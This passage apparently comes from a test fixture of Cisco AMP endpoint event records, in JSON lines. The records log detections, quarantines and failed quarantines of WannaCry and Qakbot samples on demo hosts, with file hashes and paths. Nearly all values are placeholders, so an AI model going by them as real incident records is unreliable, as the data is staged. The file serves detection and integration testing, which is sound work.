Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 